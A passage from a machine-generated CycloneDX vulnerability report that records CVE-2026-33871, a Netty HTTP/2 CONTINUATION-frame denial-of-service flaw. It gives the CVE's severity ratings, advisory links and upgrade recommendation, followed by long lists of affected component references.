          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#85b321ee-c3c3-4e32-bf78-c6485059c1ba"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#1c5e8542-bfc9-4203-8771-cd458c5fafe3"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#092fd351-b863-4553-b3a1-c56d3813e977"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#962f0c77-82b0-479e-affa-63fc755e194e"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#2351eb73-f018-4596-9d6c-0658e3f9c903"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#38cb3bbf-b884-46ff-8bae-abfe4793e16a"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#b028b582-7e33-4057-9d6d-d19dcb233ffe"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#2bd90c0a-86ae-463b-97bb-f93bb1d18f4e"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#142eb783-0a5b-400f-9449-340271c21d69"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1d097b2e-6838-41d5-8d1a-79c288a7825a"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#77ca2ddb-5012-4174-afdb-30367289d47f"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#7df636d8-c360-40aa-a31a-8bada79ec518"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "protected_at_runtime",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-33871",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        770
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, a remote user can trigger a Denial of Service (DoS) against a Netty HTTP/2 server by sending a flood of `CONTINUATION` frames. The server's lack of a limit on the number of `CONTINUATION` frames, combined with a bypass of existing size-based mitigations using zero-byte frames, allows an user to cause excessive CPU consumption with minimal bandwidth, rendering the server unresponsive. Versions 4.1.132.Final and 4.2.10.Final fix the issue.",
      "recommendation": "Upgrade io.netty:netty-codec-http2 to version 4.1.132.Final, 4.2.11.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33871"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-33871"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-w9fj-cfpg-grvv"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33871"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33871"
        }
      ],
      "published": "2026-03-27T20:16:34+00:00",
      "updated": "2026-03-30T20:10:17+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.130.Final",
          "versions": [
            {
              "version": "4.1.130.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#540e52db-abb1-48d9-a50b-9b89f495c3c7"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#540e52db-abb1-48d9-a50b-9b89f495c3c7"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#540e52db-abb1-48d9-a50b-9b89f495c3c7"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#540e52db-abb1-48d9-a50b-9b89f495c3c7"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0e02b9e7-23db-433d-bec3-3b14e9c311f3"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0e02b9e7-23db-433d-bec3-3b14e9c311f3"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0e02b9e7-23db-433d-bec3-3b14e9c311f3"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0e02b9e7-23db-433d-bec3-3b14e9c311f3"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#4e279986-5752-4b93-9f99-e67176e42bb0"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#4e279986-5752-4b93-9f99-e67176e42bb0"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#4e279986-5752-4b93-9f99-e67176e42bb0"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#4e279986-5752-4b93-9f99-e67176e42bb0"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#3ad287ba-29f8-47a4-9fdd-cdc6bf54d6ee"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#3ad287ba-29f8-47a4-9fdd-cdc6bf54d6ee"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#3ad287ba-29f8-47a4-9fdd-cdc6bf54d6ee"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#3ad287ba-29f8-47a4-9fdd-cdc6bf54d6ee"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#1879627a-3892-47c2-bda6-60c0f4d1a810"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#1879627a-3892-47c2-bda6-60c0f4d1a810"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#1879627a-3892-47c2-bda6-60c0f4d1a810"
        },
        {
          "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#1879627a-3892-47c2-bda6-60c0f4d1a810"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#9172f766-456d-48ab-b611-1f0208cdf206"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#9172f766-456d-48ab-b611-1f0208cdf206"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#9172f766-456d-48ab-b611-1f0208cdf206"
        },
        {
          "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#9172f766-456d-48ab-b611-1f0208cdf206"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#158e728b-3d7f-45e7-b632-5a1291af0e7b"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#158e728b-3d7f-45e7-b632-5a1291af0e7b"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#158e728b-3d7f-45e7-b632-5a1291af0e7b"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#158e728b-3d7f-45e7-b632-5a1291af0e7b"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#0398830b-9f3d-42ef-a8fa-a1aa5ee207a0"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#0398830b-9f3d-42ef-a8fa-a1aa5ee207a0"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#0398830b-9f3d-42ef-a8fa-a1aa5ee207a0"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#0398830b-9f3d-42ef-a8fa-a1aa5ee207a0"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
